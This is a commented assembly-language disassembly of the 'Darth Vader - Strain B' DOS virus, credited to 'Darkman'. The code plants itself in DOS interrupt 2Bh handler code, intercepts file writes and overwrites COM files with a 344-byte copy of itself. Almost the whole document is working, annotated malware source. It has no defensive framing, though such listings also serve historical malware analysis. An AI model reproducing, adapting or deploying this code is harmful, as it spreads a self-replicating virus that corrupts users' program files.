; D A R K M A N ; Proudly Presents ; Disassembly Of Darth Vader - Strain B darthvb segment assume cs:darthvb,ds:darthvb org 100h ; Origin of COM-file code: call viruscode viruscode: pop si ; Load SI from stack sub si,03h ; SI = delta offset mov ds:[0f0h],si ; DS:[00F0h] = delta offset mov ds:[0feh],ax ; Save AX at PSP xor ax,ax ; Clear AX mov ds,ax ; DS = segment of interrupt table mov es,ds:[0aeh] ; ES = segment of int 2bh mov ax,9000h mov ds,ax ; DS = segment 9000h xor di,di ; Clear DI locatearea: inc di ; Increase DI cmp di,0f00h ; DI = 3840? (DI > 3840) ja virusexit ; Greater? Jump to virusexit push di ; Save DI at stack xor si,si ; Clear SI mov cx,158h ; Compare 344 bytes repz cmpsb ; Compare segment 9000h with int 2bh pop di ; Load DI from stack jcxz installvir ; Equal? Jump to installvir jmp locatearea installvir: mov si,cs:[0f0h] ; SI = delta offset mov cs:[0f2h],di ; CS:[00F2h]=offset of int 2bh virus push cs ; Save CS at stack pop ds ; Load DS from stack (CS) mov cx,158h ; Move 344 bytes repz movsb ; Move virus to 2bh push es ; Save ES at stack pop ds ; Load DS from stack (ES) mov si,di ; SI = offset of int 2bh virus end locatemodi: inc si ; Increase SI jz virusexit ; SI = 0? Jump to virusexit push si ; Save SI at stack lodsw ; Load AX from DS:[SI] xchg ax,bx ; Exchange AX with BX lodsb ; Load AL from DS:[SI] cmp bx,0ff36h ; BX = 65334? jz modifyint2b ; Equal? Jump to modifyint2b restoreidx: pop si ; Load SI from stack jmp locatemodi modifyint2b: cmp al,16h ; AL = 22? jnz restoreidx ; Not equal? Jump to restoreidx pop si ; Load SI from stack push si ; Save SI at stack mov di,cs:[0f2h] ; DI = offset of int 2bh virus mov ds:[04h],di ; Save DI at int 2bh code add di,141h ; DI = offset of int2bcode movsw ; Move word DS:[SI] to ES:[DI] movsw ; " " " " " movsb ; " byte " " " pop di ; Load DI from stack mov al,9ah ; AL = object code of call far stosb ; Overwrite byte of int 2bh code mov ax,95h add ax,cs:[0f2h] ; AX = offset of vir2bhpart + 3 stosw ; Overwrite word of int 2bh code mov ax,es ; AX = segment of virus stosw ; Overwrite word of int 2bh code virusexit: push cs ; Save CS at stack push cs ; Save CS at stack pop ds ; Save DS at stack (CS) pop es ; Save ES at stack (CS) mov di,100h push di ; Save DI at stack mov si,ds:[0f0h] ; SI = delta offset add si,147h ; SI = SI + 327 movsw ; Move int 20h to beginning of virus movsb ; " nop " " " " mov ax,ds:[0feh] ; Load AX from PSP ret ; Return! vir2bhpart: jmp exit2bhvir ; Interrupt 2bh makes a far call to this code: mov cs:[0ah],ds ; Save DS at int 2bh code mov cs:[0ch],dx ; Save DX at int 2bh code mov cs:[0eh],cx ; Save CX at int 2bh code push ax ; Save AX at stack push bx ; Save BX at stack push cx ; Save CX at stack push es ; Save ES at stack push si ; Save SI at stack push di ; Save DI at stack cmp ah,40h ; AH = 64? (write to file) jnz vir2bhpart ; Not equal? Jump vir2bhpart cmp cx,168h ; CX=360? (number of bytes to write) jb vir2bhpart ; Less? Jump to vir2bhpart mov ax,1220h ; Get system file table number int 2fh ; Do it! (multiplex) mov bl,es:[di] ; BL = system file table number mov ax,1216h ; Get address of system fcb int 2fh ; Do it! (multiplex) add di,28h ; DI = DI + 40 push cs ; Save CS at stack pop ds ; Load DS from stack (CS) mov si,14ah add si,ds:[04h] ; SI = offset of infectext mov cx,03h ; Compare 3 bytes repz cmpsb ; Check for infectable extension jnz exit2bhvir ; Not equal? Jump to exit2bhvir push ds ; Save DS at stack pop es ; Load ES from stack (DS) mov ds,cs:[0ah] ; Load DS from int 2bh code mov si,cs:[0ch] ; Load SI from int 2bh code (DX) mov di,147h add di,cs:[04h] ; DI = offset of infectext - 3 movsw ; Move int 20h to beginning of virus movsb ; " nop " " " " mov ax,9000h mov es,ax ; ES = segment 9000h mov cx,cs:[0eh] ; Load CX from int 2bh code locate2bh: xor di,di ; Clear DI inc si ; Increase SI dec cx ; Decrease CX jz exit2bhvir ; CX = 0? Jump to exit2bhvir push cx ; Save CX at stack push si ; Save SI at stack mov cx,158h ; Compare 344 bytes repz cmpsb ; Compare segment 9000h with int 2bh pop si ; Load SI from stack jcxz modiint2b ; Equal? Jump to modiint2b pop cx ; Load CX from stack jmp locate2bh modiint2b: pop cx ; Load CX from stack push si ; Save SI at stack push ds ; Save DS at stack mov es,cs:[0ah] ; Load ES from int 2bh code (DS) mov di,cs:[0ch] ; Load DI from int 2bh code (DX) mov al,0e9h ; AL = object code of jump near stosb ; Overwrite byte of int 2bh code sub si,cs:[0ch] ; SI = SI - DX sub si,03h ; SI = SI - 3 mov ax,si stosw ; Overwrite word of int 2bh code pop es ; Load ES from stack pop di ; Load DI from stack push cs ; Save CS at stack pop ds ; Load DS from stack (CS) mov si,cs:[04h] ; SI = offset of int 2bh virus mov cx,158h ; Move 344 bytes repz movsb ; Overwrite real code with virus exit2bhvir: pop di ; Load DI from stack pop si ; Load SI from stack pop es ; Load ES from stack pop cx ; Load CX from stack pop bx ; Load BX from stack pop ax ; Load AX from stack mov dx,cs:[0ch] ; Load DX from int 2bh code mov ds,cs:[0ah] ; Load DS from int 2bh code int2bcode db 5 dup(?) ; Int 2bh's realcode is saved here retf ; Return far! int 20h ; Exit to DOS! nop infectext db 'COM' ; Infectable extension virusname db 'Darth Vader' nop darthvb ends end code